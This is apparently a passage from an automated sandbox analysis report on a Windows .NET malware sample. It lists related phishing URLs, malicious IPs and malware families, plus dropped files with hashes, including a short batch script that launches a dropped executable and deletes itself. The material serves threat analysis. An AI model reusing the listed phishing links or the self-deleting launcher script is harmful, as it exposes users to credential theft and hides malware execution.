                                CLOUDFLARENETUSESD99W89W99-PO9W2788Q-SHK092782.exeGet hashmaliciousSnake KeyloggerBrowse
                                • 188.114.97.3
                                http://okcoin.83670.cyou/Index/index/Lang/it-it/Trade/tradelistGet hashmaliciousUnknownBrowse
                                • 104.21.13.231
                                http://jans-radical-site-16409d.webflow.io/Get hashmaliciousUnknownBrowse
                                • 104.18.161.117
                                http://terjal.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                • 188.114.96.3
                                http://sreypheasin.github.io/Netflix/Get hashmaliciousHTMLPhisherBrowse
                                • 104.17.24.14
                                https://in-50card.ru/wrGet hashmaliciousUnknownBrowse
                                • 104.17.25.14
                                http://meatamasklogine.gitbook.io/Get hashmaliciousUnknownBrowse
                                • 172.64.147.209
                                http://pub-60aa8cdea4ff48c8b784d120879cbb5a.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 172.66.0.235
                                https://request-checksid-711843.pages.dev/robots.txt/Get hashmaliciousUnknownBrowse
                                • 104.26.13.205
                                http://netflix.benasenso.site/Get hashmaliciousUnknownBrowse
                                • 172.66.0.227
                                ALPHAONE-ASUStemp_script.batGet hashmaliciousPureLog StealerBrowse
                                • 45.11.229.96
                                Aqua.mpsl-20240804-2157.elfGet hashmaliciousUnknownBrowse
                                • 45.13.227.24
                                Aqua.arm7-20240804-2157.elfGet hashmaliciousMiraiBrowse
                                • 45.13.227.24
                                Aqua.mips-20240804-2157.elfGet hashmaliciousUnknownBrowse
                                • 45.13.227.24
                                Aqua.x86_64-20240804-2157.elfGet hashmaliciousUnknownBrowse
                                • 45.13.227.24
                                sora.m68k.elfGet hashmaliciousMiraiBrowse
                                • 38.79.86.219
                                ca1b58Nxwf.elfGet hashmaliciousUnknownBrowse
                                • 45.13.227.201
                                GWtByYqyGD.elfGet hashmaliciousUnknownBrowse
                                • 45.13.227.201
                                nWlbyBDOUp.elfGet hashmaliciousUnknownBrowse
                                • 45.13.227.201
                                TIzx8Y748C.elfGet hashmaliciousUnknownBrowse
                                • 45.13.227.201
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                a0e9f5d64349fb13191bc781f81f42e1http://gsx2-crm-apple-portal.com/go.phpGet hashmaliciousUnknownBrowse
                                • 104.21.39.11
                                x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                • 104.21.39.11
                                software.exeGet hashmaliciousLummaCBrowse
                                • 104.21.39.11
                                DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                • 104.21.39.11
                                l6E.exeGet hashmaliciousLummaCBrowse
                                • 104.21.39.11
                                file.exeGet hashmaliciousLummaCBrowse
                                • 104.21.39.11
                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                • 104.21.39.11
                                log-analyzer.exeGet hashmaliciousLummaC, MicroClipBrowse
                                • 104.21.39.11
                                file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                • 104.21.39.11
                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                • 104.21.39.11
                                No context
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):1.1053141035934735
                                Encrypted:false
                                SSDEEP:192:Ie7yeFy/x+U/0BU/AjezEKMvQzuiFGZ24IO8Z:t70x+UsBU/AjeivQzuiFGY4IO8Z
                                MD5:A08E4B557EB93C2A2718990CB2F73B75
                                SHA1:FFE76C350BE31AAB42CBC357DD8178F88E98FFA8
                                SHA-256:95E30F27969A4B6C0B06EFC5A27BCA1016A8D8AEE45BAC5F2021C23E92D41C3C
                                SHA-512:2DFBD2FB52AB1497B79A5A73D945898B042A38DD11EA75A1140EB56D3CB04DC0FD2DC6F42F42B5699554161E49D59BF89EEE780125D15B3419F46A24394511E5
                                Malicious:false
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.1.7.9.1.6.4.6.6.4.2.8.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.1.7.9.1.6.5.2.7.3.6.7.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.d.e.2.6.e.9.-.2.2.c.0.-.4.f.3.b.-.8.b.3.f.-.f.b.e.c.9.9.3.4.5.6.0.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.4.9.7.c.c.e.-.c.b.e.2.-.4.d.c.3.-.b.5.3.5.-.e.7.5.f.8.d.b.3.5.3.2.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.4.c.-.0.0.0.1.-.0.0.1.4.-.1.8.5.0.-.f.0.8.1.2.a.0.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 15 streams, Thu Sep 19 00:26:04 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):109378
                                Entropy (8bit):2.0760235361754273
                                Encrypted:false
                                SSDEEP:384:9hTlbWYQBR9vYbfx5HnjDrGUJbRFfT2sbvkpyDqYJL8ZOQtIuoNEtGw5QauBV9FT:7xu9Ybfx5njzRvvkpXSw4AuBVQ40G06
                                MD5:2478ACF86AE37DB25E864622C9BE6F8E
                                SHA1:4E4285C2C9036BDD5C9FDB57B1328B58DAEE0862
                                SHA-256:C91054C3727B45137213F2A087F888200539400741C9A1897F1058FADF2FB754
                                SHA-512:4A6033A45EFBDBDE80E059DE224090DD71E248C1E9B1F3DEAFA3683102BB254E094D53D91B5814755FFC446D517866AFF149CACD4CB6D43DC758A167C5B5BD7F
                                Malicious:false
                                Preview:MDMP..a..... ........o.f....................................<...L%...........I..........`.......8...........T............D...f...........%..........t'..............................................................................eJ.......(......GenuineIntel............T.......L....o.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):6290
                                Entropy (8bit):3.7187278527541707
                                Encrypted:false
                                SSDEEP:96:RSIU6o7wVetbrS6K6YrQE/3nBl5aM4UW89bX8nWsfI2TfiGm:R6l7wVeJrS6K6YrdDprW89bXNsfxf9m
                                MD5:87BB0C879E289032536C52740BE05366
                                SHA1:07A53A0D65186962A53FF364D5CE1B22D7514BDF
                                SHA-256:F53866E9998DED5FF37F40382A84C0D2958DEEB08E35857FA7DE120BD219353A
                                SHA-512:BCCB02E997D8DCE9026D4E4877371DF2CEF92B1BE98B384073C4F8A9D51E66B71D64419A8A459AF32139A9E2304BD0B7508018DBCF0D6C056DFA75516B2A4FFA
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.2.4.<./.P.i.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4628
                                Entropy (8bit):4.448492256173255
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zs4NJg77aI9bQWpW8VYjYPYm8M4JfursEFI7+q8oAC8QgLuOLuird:uIjfUI7Jp7VFSJfuoV7vAfBukuird
                                MD5:44CCB2FB1891DDCEE58EED983EF28662
                                SHA1:135B764D89F1664695C9BAD5E29515E22D555B19
                                SHA-256:1F2589DDA3D45B81FAD26DBC2B4BA0A07B805EB22D12B458814A4EAFFFDA282A
                                SHA-512:0AD8BAEC6962CAC49844EEEC189C8F4634254822E7D2DB56267B5944D44F6E3C27CEA19C43C6F18E51D1BB4DD98667D23B2FFC76AF084E6A975D11A6E0CD40AB
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="506368" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Users\user\Desktop\57lklPjdPc.exe
                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                Category:dropped
                                Size (bytes):71954
                                Entropy (8bit):7.996617769952133
                                Encrypted:true
                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                Malicious:false
                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                Process:C:\Users\user\Desktop\57lklPjdPc.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):290
                                Entropy (8bit):2.9650783718157077
                                Encrypted:false
                                SSDEEP:6:kKb9Usw9L+N+SkQlPlEGYRMY9z+4KlDA3RUe/:aD9LNkPlE99SNxAhUe/
                                MD5:20D286EC6E66F5CD74C1B720C2CD3605
                                SHA1:FB3DFC05770D046AA306F320F6BC102571F5D48B
                                SHA-256:04D7381277377CDC8ACE125EA6A06B98522CC4375CD82D862D565CE3AA8F4812
                                SHA-512:4F2A1F5CFBE07EE28E2B76407A09C9D55B3F69676AB56D7658A4F27B575826864D446D9B2B63AE4815C0231DCFDA4A222FE862ACF88488F05F912B5360E1D78E
                                Malicious:false
                                Preview:p...... ..........c*...(....................................................... ........G..@.......................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...
                                Process:C:\Users\user\AppData\Roaming\57lklPjdPc.exe
                                File Type:CSV text
                                Category:dropped
                                Size (bytes):642
                                Entropy (8bit):5.345222650979019
                                Encrypted:false
                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaWzAbDLI4MNldKZav:ML9E4KlKDE4KhKiKhBsXE4qdKm
                                MD5:EB87E83E34AF417CE333BB15E155327E
                                SHA1:B858663F7B3D5156C095FC94DB214222CD3B1110
                                SHA-256:F43D3FC80C69F1A109BF440E86827E4BBAB5F37B30264BA48D5106F9FA961724
                                SHA-512:107BD8FAA0B88991B462D20A687EEAD332AA559AC086E311C5948FE459C024BA61E15FFD4D2BF79AD1C30BAD672AC40097B89F278070EB346FAF4228B954DA39
                                Malicious:true
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..
                                Process:C:\Users\user\AppData\Roaming\l6E.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):42
                                Entropy (8bit):4.0050635535766075
                                Encrypted:false
                                SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1260
                                Entropy (8bit):5.3837950536173365
                                Encrypted:false
                                SSDEEP:24:3qyt7WSKco4KmZjKbmOIKod6emZ9tYs4RPQoUGt/NK3R8IHia6mu:ayxWSU4xympjmZ9tz4RIoUeNWR8IH4mu
                                MD5:6EA2677EC198C5E4C44AB8D86BDB4B1A
                                SHA1:322247F10EABBCE1E7F4FDC8C4ADB69594E2FE0E
                                SHA-256:27AE272ECC8EA199FF856816A2B351772F398A2B3EC2A028ECE99D3F7FFB1B2C
                                SHA-512:F569166D5C73BB2B821B087BE4245220A207066976BE8E2E5C1FFF3C8373D3489822D685D7746B2022BF7A683B1EF041548F364A184071D937E77B2C05E2FAB1
                                Malicious:false
                                Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.D....................+.H..!...e........System.Configuration.Ins
                                Process:C:\Users\user\Desktop\57lklPjdPc.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):166
                                Entropy (8bit):5.151772492108145
                                Encrypted:false
                                SSDEEP:3:mKDDVNGvTVLqFvEROr+jn9m1t+kiEaKC5i0ZBktKcKZG1t+kiE2J5xAI84HEhn:hCRLqFcROr+DE1wknaZ5i0ZKOZG1wknB
                                MD5:4DC509C08116C83EBAEFE57CA2B21E39
                                SHA1:D940E8E15D791A8537713B6B2589AC6F6E7ABD2B
                                SHA-256:0F4CBDDBBD5ED9425A9215F5F3AAC60328F8D4D4EBB583741E6E1F7D728E93CA
                                SHA-512:6EF206FF72204456C813361EDC2D7C1B6ED9EF8AEB5D2DC11994B76FA10980F277CCB5C89B377F7D5322CA03D512A3A32204C0D36C619AD7929B6D97E0BFD36F
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                Preview:@echo off..chcp 65001..ping -n 5 localhost > nul..start "" "C:\Users\user\AppData\Roaming\l6E.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\XgrafwGYiYyF.bat"
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Users\user\Desktop\57lklPjdPc.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):352768
                                Entropy (8bit):7.854006767539572
                                Encrypted:false
                                SSDEEP:6144:dN1noCMJh6qP/LEkjKVP4vWtL9KeaIQ3Wjn2XJBck0XU9EljKwt0bRg:IS6/Ykj0P4vWtL9Kk6KOBfUx+Qyg
                                MD5:C164ED9887BD51CBA150379514DC4E81
                                SHA1:178639B8961FA5236683498E06F78B8887155999
                                SHA-256:B748235A791B5F8C5B80202EF3345BC8325A7EA246B004D57DF5521E2F79B429
                                SHA-512:778DED0EE041DC7710AAA8B76BB3C7ABF319744BEA48BBA91F2013CEA2B1704DFAADABBC675B4035AC3C0DB68AE046B3737E8E42815FB864B6A146B575CBD65A
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 58%
                                • Antivirus: Virustotal, Detection: 62%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....D...............0..X..........nw... ........@.. ....................................@................................. w..K.......p............................................................................ ............... ..H............text...tW... ...X.................. ..`.rsrc...p............Z..............@..@.reloc...............`..............@..B................Pw......H.......P...XR...........................................................*...(....*..(....*..0..l.......(...... ....o..... .Z.p ..!a~M...{{...a('...(....o..... XE. .@.ka~M...{>...a('...(....o......o.....o....o.....s..... .~.......%.....(....s........s.........o....s.......o....s....................o....&...(.........s..........o....s .........o....o!........c.....9......o"......9......o"......9......o"......9......o".....9.....o".....9.....o".....9.....o"......*A...........
                                Process:C:\Users\user\Desktop\57lklPjdPc.exe
                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):354168
                                Entropy (8bit):7.9876324425692316
                                Encrypted:false
                                SSDEEP:6144:HDd+O7VyIqZiQUa+I0st4nlSVbiWN6VqWeqfn3Zsz9HMiobZYK1QE:B+O5yIqxwI3tFOqWeqcYbZYzE
                                MD5:FAC2188E4A28A0CF32BF4417D797B0F8
                                SHA1:1970DE8788C07B548BF04D0062A1D4008196A709
                                SHA-256:D737637EE5F121D11A6F3295BF0D51B06218812B5EC04FE9EA484921E905A207
                                SHA-512:58086100D653CEEAE44E0C99EC8348DD2BEAF198240F37691766BEE813953F8514C485E39F5552EE0D18C61F02BFF10C0C427F3FEC931BC891807BE188164B2B
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 29%
                                • Antivirus: Virustotal, Detection: 54%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................4...........R... ...`....@.. ....................................`..................................R..S....`...............>..x)..........PQ............................................... ............... ..H............text....2... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............<..............@..B.................R......H.......XA.................................................................) .j.\E...\...p..M.:..[.1..,j,@}g......b..CZ.)...^....Z..............M|...!.D&.&K.RbW..L..._r..c...u....0..7(..m0]...(..x\...*..;.}:.[.J.$=....&h,\..`M.!x.....`.)C...h.p(...}.{.n.+J\C....=..?#.A...#....j&G.`5b....|.FT..>Z...A....w.&..J...5...uf..J.U.2F....Gd.F......+".P..N'.D...$.G:2.Rm`5......Zz ...H..Q.._...F.j.h`.UE.W.Sc(./..D..@xn.....<#hk=b.f.\.......1...x....+.b.m+f..b..'...n
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.4663377023962925
                                Encrypted:false
                                SSDEEP:6144:3IXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNmdwBCswSb+:4XD94zWlLZMM6YFH8++
                                MD5:127120791C49988EDC8FA64B21B75D74
                                SHA1:965125A65E5A25BB2D54304006E7D4954E40644E
                                SHA-256:E843F5E3F8371F84E93C3B47C6531A12F6BF926D7DD8A6AD8BD96D2DB243D00B
                                SHA-512:EB8B5EA12941C8E2AF1F22EA6B871BE79CC0981F12E0F233E4D1051493F2453AF748CADDE8C3228782468F95B400AA3FC229D932445DA0750DEEBDD94F2EAA25
                                Malicious:false
                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv.P.*................................................................................................................................................................................................................................................................................................................................................YG.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\PING.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):365
                                Entropy (8bit):4.7434189684962265
                                Encrypted:false
                                SSDEEP:6:PzIUEkwvmWxHLTSJALTSJALTSJALTSJALTSrcsWTo65FWjwAFeMmvVOIHJFxMVl7:PEUZw5pTcgTcgTcgTcgTLs4oSsEAFSkz
                                MD5:1C281F3255D3BE0B72C85F55DDA75BF9
                                SHA1:EFA33BB1D5DDA153F426813000C0C839DA3A263C
                                SHA-256:4D7F02D6735DEEE9A410C631145CB3934BE2F8282BF61CBB88934D0C8270A593
                                SHA-512:6B1D4929BDFB97AA9E1D9F13685104E9FC4B22D34D7F4258BEE8A25E5CF6207876C70D581DAE8320D0A1516300921722CDB390C92438572F4B57FAF1969F65A9
                                Malicious:false
                                Preview:..Pinging 888683 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.854006767539572
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:57lklPjdPc.exe
                                File size:352'768 bytes
                                MD5:c164ed9887bd51cba150379514dc4e81
                                SHA1:178639b8961fa5236683498e06f78b8887155999
                                SHA256:b748235a791b5f8c5b80202ef3345bc8325a7ea246b004d57df5521e2f79b429
                                SHA512:778ded0ee041dc7710aaa8b76bb3c7abf319744bea48bba91f2013cea2b1704dfaadabbc675b4035ac3c0db68ae046b3737e8e42815fb864b6a146b575cbd65a
                                SSDEEP:6144:dN1noCMJh6qP/LEkjKVP4vWtL9KeaIQ3Wjn2XJBck0XU9EljKwt0bRg:IS6/Ykj0P4vWtL9Kk6KOBfUx+Qyg
                                TLSH:AD7412417A8E5719C56856B9C0D3242403F2A7CB7673DBAB3E0D03A84F02399DF56FA5
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....D...............0..X..........nw... ........@.. ....................................@................................
                                Icon Hash:90cececece8e8eb0
                                Entrypoint:0x45776e
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x9944C62E [Mon Jun 26 19:40:30 2051 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
